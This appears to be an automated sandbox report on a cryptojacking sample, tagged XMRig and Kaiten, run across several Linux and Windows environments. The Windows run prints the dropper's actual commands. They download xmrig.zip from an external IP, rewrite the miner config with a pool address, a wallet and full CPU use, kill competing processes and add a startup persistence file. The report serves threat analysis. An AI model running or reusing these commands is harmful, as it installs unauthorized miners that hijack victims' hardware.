Malware Analysis Report

2024-12-01 00:48

Sample ID 211029-xtncksafbp
Target SugarLogic_#[email protected]
SHA256 317806eaebb1cec9ddb962ef7fa19ee0673a67db3a8c7d650d76885041031ce8
Tags
xmrig evasion miner kaiten
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

317806eaebb1cec9ddb962ef7fa19ee0673a67db3a8c7d650d76885041031ce8

Threat Level: Known bad

The file SugarLogic_#[email protected] was found to be: Known bad.

Malicious Activity Summary

xmrig evasion miner kaiten

Kaiten family

Identified Kaiten Bot

XMRig Miner Payload

xmrig

Xmrig family

XMRig Miner Payload

Blocklisted process makes network request

Stops running service(s)

Executes dropped EXE

Drops startup file

Launches sc.exe

Kills process with taskkill

Enumerates processes with tasklist

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-10-29 19:09

Signatures

Identified Kaiten Bot

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Kaiten family

kaiten

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Analysis: behavioral4

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-armhf-en-20211025

Max time kernel

0s

Command Line

[/tmp/566148710/payload.dat]

Signatures

N/A

Processes

/tmp/566148710/payload.dat

[/tmp/566148710/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-armhf-en-20211025

Max time kernel

0s

Command Line

[/tmp/128429670/payload.dat]

Signatures

N/A

Processes

/tmp/128429670/payload.dat

[/tmp/128429670/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-mipsel-en-20211025

Max time kernel

0s

Command Line

[/tmp/217523984/payload.dat]

Signatures

N/A

Processes

/tmp/217523984/payload.dat

[/tmp/217523984/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20211014

Max time kernel

123s

Max time network

147s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"

Signatures

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\moneroocean\xmrig.exe N/A
N/A N/A C:\Users\Admin\moneroocean\xmrig.exe N/A

Stops running service(s)

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\moneroocean_miner.bat C:\Windows\system32\cmd.exe N/A

Launches sc.exe

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\moneroocean\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\moneroocean\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3116 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3116 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2272 wrote to memory of 3368 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2272 wrote to memory of 3368 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3116 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 3116 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3116 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3116 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 3116 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 3116 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 3116 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 3116 wrote to memory of 528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3116 wrote to memory of 528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3116 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3116 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3116 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3448 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3448 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\xmrig.exe
PID 3116 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\xmrig.exe
PID 3116 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2976 wrote to memory of 3516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2976 wrote to memory of 3516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3516 wrote to memory of 2152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\HOSTNAME.EXE
PID 3516 wrote to memory of 2152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\HOSTNAME.EXE
PID 3116 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3184 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3184 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3116 wrote to memory of 3288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3116 wrote to memory of 3288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3116 wrote to memory of 816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3116 wrote to memory of 816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3116 wrote to memory of 3416 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\xmrig.exe
PID 3116 wrote to memory of 3416 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\where.exe

where powershell

C:\Windows\system32\where.exe

where find

C:\Windows\system32\where.exe

where findstr

C:\Windows\system32\where.exe

where tasklist

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\system32\sc.exe

sc stop moneroocean_miner

C:\Windows\system32\sc.exe

sc delete moneroocean_miner

C:\Windows\system32\taskkill.exe

taskkill /f /t /im xmrig.exe

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Users\Admin\moneroocean\xmrig.exe

"C:\Users\Admin\moneroocean\xmrig.exe" --help

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"94.130.12.27:3333\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"438ss2gYTKze7kMqrgUagwEjtm993CVHk1uKHUBZGy6yPaZ2WNe5vdDFXGoVvtf7wcbiAUJix3NR9Ph1aq2NqSgyBkVFEtZ\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"WinTendo\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"

C:\Windows\system32\tasklist.exe

tasklist /fi "imagename eq xmrig.exe"

C:\Windows\system32\find.exe

find ":"

C:\Users\Admin\moneroocean\xmrig.exe

C:\Users\Admin\moneroocean\xmrig.exe --config="C:\Users\Admin\moneroocean\config_background.json"

Network

Country Destination Domain Proto
DE 85.214.149.236:443 85.214.149.236 tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/2272-117-0x0000000000000000-mapping.dmp

memory/3368-118-0x0000000000000000-mapping.dmp

memory/3964-119-0x0000000000000000-mapping.dmp

memory/1192-120-0x0000000000000000-mapping.dmp

memory/644-121-0x0000000000000000-mapping.dmp

memory/872-122-0x0000000000000000-mapping.dmp

memory/1036-123-0x0000000000000000-mapping.dmp

memory/2248-124-0x0000000000000000-mapping.dmp

memory/3716-125-0x0000000000000000-mapping.dmp

memory/528-126-0x0000000000000000-mapping.dmp

memory/1772-127-0x0000000000000000-mapping.dmp

memory/3668-128-0x0000000000000000-mapping.dmp

memory/3668-129-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-130-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-131-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-132-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-133-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-134-0x0000020F9E790000-0x0000020F9E791000-memory.dmp

memory/3668-135-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-136-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-137-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-138-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-139-0x0000020FB8A60000-0x0000020FB8A61000-memory.dmp

memory/3668-140-0x0000020FB6900000-0x0000020FB6902000-memory.dmp

memory/3668-141-0x0000020FB6903000-0x0000020FB6905000-memory.dmp

memory/3668-142-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-148-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/3668-149-0x0000020FB6906000-0x0000020FB6908000-memory.dmp

memory/3668-150-0x0000020F9C8B0000-0x0000020F9C8B2000-memory.dmp

memory/1732-151-0x0000000000000000-mapping.dmp

memory/1732-153-0x00000221427D0000-0x00000221427D2000-memory.dmp

memory/1732-154-0x00000221427D0000-0x00000221427D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 56efdb5a0f10b5eece165de4f8c9d799
SHA1 fa5de7ca343b018c3bfeab692545eb544c244e16
SHA256 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA512 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

memory/1732-155-0x00000221427D0000-0x00000221427D2000-memory.dmp

memory/1732-157-0x00000221427D0000-0x00000221427D2000-memory.dmp

memory/1732-156-0x00000221427D0000-0x00000221427D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 40ef7db7b590b37dbe14b834480916eb
SHA1 0b48e0e3631424f46ad5ef8d39d93421e9b9c5b6
SHA256 186e56656bb4d26c0866bd16f8737ec01e2c647ea0cc22890caeb12be8cf8e4c
SHA512 7eb9cc596ce3a720a990e35281eb21570b89951af07d3eb4145c23be1e566cfb02c1df77c26101e5e17acaab1f985ef2e0d8b568ddb52db2a5699ababf1985a1

memory/1732-160-0x00000221427D0000-0x00000221427D2000-memory.dmp

memory/1732-161-0x00000221427D0000-0x00000221427D2000-memory.dmp

memory/1732-162-0x00000221427D0000-0x00000221427D2000-memory.dmp

memory/1732-164-0x00000221427D0000-0x00000221427D2000-memory.dmp

memory/1732-170-0x000002215ADF0000-0x000002215ADF2000-memory.dmp

memory/1732-172-0x000002215ADF3000-0x000002215ADF5000-memory.dmp

memory/1732-182-0x000002215D050000-0x000002215D051000-memory.dmp

memory/1732-183-0x000002215D080000-0x000002215D081000-memory.dmp

C:\Users\Admin\xmrig.zip

MD5 877492e0bf1e064eef97339fd71990fd
SHA1 3f4988a2b1ca38850b8798974f01cd76815af684
SHA256 17862610ea8190e3ed4d22099d324d9058b15c941ce97236405fc80d3c50d747
SHA512 016fec4d0c9c9ad4ec6de82456bc41b1c59cfcf8c13781ce457b939f44a21b91c68decf02c05f39d4646e4480734b592c3c6753750b21836b231ab87e70f973d

memory/1732-185-0x00000221427D0000-0x00000221427D2000-memory.dmp

memory/3448-186-0x0000000000000000-mapping.dmp

memory/3448-187-0x000002625E110000-0x000002625E112000-memory.dmp

memory/3448-188-0x000002625E110000-0x000002625E112000-memory.dmp

memory/3448-189-0x000002625E110000-0x000002625E112000-memory.dmp

memory/3448-190-0x000002625E110000-0x000002625E112000-memory.dmp

memory/3448-191-0x000002625E110000-0x000002625E112000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0d66cbceb3ec62c57dd66cc0f4282156
SHA1 f5373d3010118067555c7a4a8ef8817f910b4dfc
SHA256 dc603c5cdd5dd1394df01bcd9279807564149d545d1aca2b4950536dd808f46a
SHA512 dd0a747710e5008f4ac7f5519d40fccb876fcff5ce592f39d25b55d78cf01763cb33a5246afd51f3fdb0518510c7f74eafd424cc1132343957bf3bf74ce1b4d1

memory/3448-194-0x000002625E110000-0x000002625E112000-memory.dmp

memory/3448-195-0x000002625E110000-0x000002625E112000-memory.dmp

memory/3448-197-0x000002625E110000-0x000002625E112000-memory.dmp

memory/3448-196-0x000002625E110000-0x000002625E112000-memory.dmp

memory/1732-199-0x000002215ADF6000-0x000002215ADF8000-memory.dmp

memory/3448-200-0x0000026278090000-0x0000026278092000-memory.dmp

memory/3448-201-0x0000026278093000-0x0000026278095000-memory.dmp

memory/3448-202-0x000002625E110000-0x000002625E112000-memory.dmp

C:\Users\Admin\moneroocean\config.json

MD5 bfa626e053028f9adbfaceb5d56086c3
SHA1 acf9d3be3211c8f96b823517ea83888982d498d3
SHA256 c17e1a22b7bc00e591aede9d101b843ff2e47d5b582bb0628406bbd53b7dac78
SHA512 692115d964b98f380c0f45a9e25dc3d22bc53447c1aa76732103e7ac1807459c45348d873dcb0eeb92ca38f9a954f27078a8f4a3508ca5b4b3809a92f02765d0

memory/2712-212-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\xmrig.exe

MD5 90ba713a657fe704ca05fbcfd967c245
SHA1 020c59739d08b12008554ec48af07ec35d12f178
SHA256 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847
SHA512 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3

C:\Users\Admin\moneroocean\xmrig.exe

MD5 90ba713a657fe704ca05fbcfd967c245
SHA1 020c59739d08b12008554ec48af07ec35d12f178
SHA256 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847
SHA512 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3

memory/3448-216-0x0000026278096000-0x0000026278098000-memory.dmp

memory/2976-217-0x0000000000000000-mapping.dmp

memory/3516-218-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fb273c9c89cac500fcbadabed98e3375
SHA1 e2563ab7ad20b04b1aa62a9aaf4862be800ae2bf
SHA256 bfa054896268067d7d081d4ff4e1731ad8f88ec92e523ff736137ba75977a8d8
SHA512 ec31170d7279822739a2c45af21df92a32294757bad8bcf3b609e0b489319ad784f706fd1a9db43c9e7a9223b76306420f1a81fdd98fccd856bb62e82d7ddfe1

memory/2152-231-0x0000000000000000-mapping.dmp

memory/2684-233-0x0000000000000000-mapping.dmp

memory/3516-240-0x0000016D47A10000-0x0000016D47A12000-memory.dmp

memory/3516-241-0x0000016D47A13000-0x0000016D47A15000-memory.dmp

memory/3516-242-0x0000016D47A16000-0x0000016D47A18000-memory.dmp

memory/2684-243-0x0000024634AB0000-0x0000024634AB2000-memory.dmp

memory/2684-244-0x0000024634AB3000-0x0000024634AB5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ba8ae666e929aa64d0504993fba65ee9
SHA1 89c35367510d0153cef20bd7d2b31a5470b1e441
SHA256 2baa317c75ad71a43c1873cb2931eed865638179d918c790b900e6fb0873624c
